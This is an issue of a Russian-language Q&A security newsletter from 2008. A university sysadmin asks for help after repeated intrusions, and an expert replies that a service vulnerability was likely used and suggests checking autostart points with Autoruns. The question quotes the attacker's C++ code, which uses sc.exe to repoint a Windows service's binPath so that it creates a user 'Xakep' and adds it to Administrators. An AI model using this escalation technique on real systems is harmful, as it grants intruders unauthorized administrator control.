Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

RusFAQ.ru: Защита информации


Новое направление Портала RusFAQ.ru:
MosHoster.ru - Профессиональный хостинг

РАССЫЛКИ ПОРТАЛА RUSFAQ.RU

/ КОМПЬЮТЕРЫ И ПО / Защита информации / Защита информации

Выпуск № 365
от 03.02.2008, 12:05

Администратор:Калашников О.А.
В рассылке:Подписчиков: 633, Экспертов: 54
В номере:Вопросов: 1, Ответов: 1

Нам важно Ваше мнение об этой рассылке.
Оценить этот выпуск рассылки >>


Вопрос № 120583: Привет всем. Сразу прошу прошение за ошибки (не из России я). Такая проблема у миня, я СисАдмин в Университете (администрираю 40 комп. OS : Win 2000 Pro (all hotfixes)) В прошом году меня тоже взломали, уже не знал чо делать, но нечаина н...

Вопрос № 120.583
Привет всем.
Сразу прошу прошение за ошибки (не из России я).
Такая проблема у миня, я СисАдмин в Университете (администрираю 40 комп. OS : Win 2000 Pro (all hotfixes))
В прошом году меня тоже взломали, уже не знал чо делать, но нечаина на один компютар нашол утилиты : sc.exe и Service Permissions Checker.
Вот што они делали :

[URL=http://img57.imageshack.us/my.php?image=hackedrk1.jpg][IMG]http://img57.imageshack.us/img57/5444/hackedrk1.th.jpg[/IMG][/URL]

После того как удалил всё, вот што показовала :

[URL=http://img244.imageshack.us/my.php?image=systemsecureav2.jpg][IMG]http://img244.imageshack.us/img244/228/systemsecureav2.th.jpg[/IMG][/URL]

Карочи, удалил я Macromedia Licensing.exe, и Сервис тоже удалил в регедит, думал што всё теперь проблем больше не будет, не тут то было.
Согодня опять спалил новыи Юзер "Хакер", и на Диск Д: нашол код зделан в С++.

[CODE]// sys.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include <stdlib.h>
#include <windows.h>
#include <conio.h>
int main(int argc, char* argv[])
{
// WinExec("sc.exe queryex "Macromedia Licensing Services" > d:\log.log.log",SW_SHOW);
WinExec("sc.exe config "Macromedia Licensing Service" binPath= "net user Xakep Xakep /add"",SW_SHOW);
Sleep(1000);
WinExec("sc.exe start "Macromedia Licensing Service"",SW_SHOW);
Sleep(1000);
WinExec("sc.exe config "Macromedia Licensing Service" binPath= "net localuser Administrators Xakep /add"",SW_SHOW);
Sleep(1000);
WinExec("sc.exe start "Macromedia Licensing Service"",SW_SHOW);
getch();
return 0;
}[/CODE]
..и ищо несколько фаилов, вылажу на рапид штоб посмотрели:
http://rapidshare.com/files/87310556/sys.rar.html

В моём зале много програм есть в том числе и Visual Studio ну конечно есть и cmd.exe
Все студенты работают под User - Restricted user.
С: - read & Execute, в regedit тоже самое, и в Group Policy по игрался.

Не понемаю как они создают новыи Сервис в регедит, User имеет права толыко читать, есть предположение што они под Юзер : System делают ето.
Помогите пожалуиста, не знаю уже што делать, спасибо аднозначно, жду ответов штоб решить проблему.
Отправлен: 28.01.2008, 20:01
Вопрос задал: EXtremer (статус: Посетитель)
Всего ответов: 1
Мини-форум вопроса >>> (сообщений: 11)

Отвечает: DimanG
Здравствуйте, EXtremer!

Предположить можно следующее, судя по вашей картинке: была использована уязвимость в службе лицензирования от Macromedia (если у вас таковая имеется) для выполнения кода, повышающего привилегии пользователя Xakep. Также вам необходимо исследовать все точки автозапуска, т.к. этот код, который вы выложили, мог быть исполнен под админскими (вашими, например) правами (до того, как Xakep сам станет админом). Утиль берём отсюдова: http://download.sysinternals.com/Files/Autoruns.zip . Информации для анализа пока недостаточно.
---------
Компьютеры позволяют решать множество проблем, которых до появления компьютеров не существовало.
Ответ отправил: DimanG (статус: 9-ый класс)
Ответ отправлен: 29.01.2008, 09:16


Вы имеете возможность оценить этот выпуск рассылки.
Нам очень важно Ваше мнение!
Оценить этот выпуск рассылки >>

Отправить вопрос экспертам этой рассылки

Приложение (если необходимо):

* Код программы, выдержки из закона и т.п. дополнение к вопросу.
Эта информация будет отображена в аналогичном окне как есть.

Обратите внимание!
Вопрос будет отправлен всем экспертам данной рассылки!

Для того, чтобы отправить вопрос выбранным экспертам этой рассылки или
экспертам другой рассылки портала RusFAQ.ru, зайдите непосредственно на RusFAQ.ru.


Форма НЕ работает в почтовых программах The BAT! и MS Outlook (кроме версии 2003+)!
Чтобы отправить вопрос, откройте это письмо в браузере или зайдите на сайт RusFAQ.ru.


© 2001-2008, Портал RusFAQ.ru, Россия, Москва.
Авторское право: ООО "Мастер-Эксперт Про"
Техподдержка портала, тел.: +7 (926) 535-23-31
Хостинг: "Московский хостер"
Поддержка: "Московский дизайнер"
Авторские права | Реклама на портале
Версия системы: 4.70 от 17.01.2008
Яндекс Rambler's Top100
RusFAQ.ru | MosHoster.ru | MosDesigner.ru | RusIRC.ru
Kalashnikoff.ru | RadioLeader.ru | RusFUCK.ru

В избранное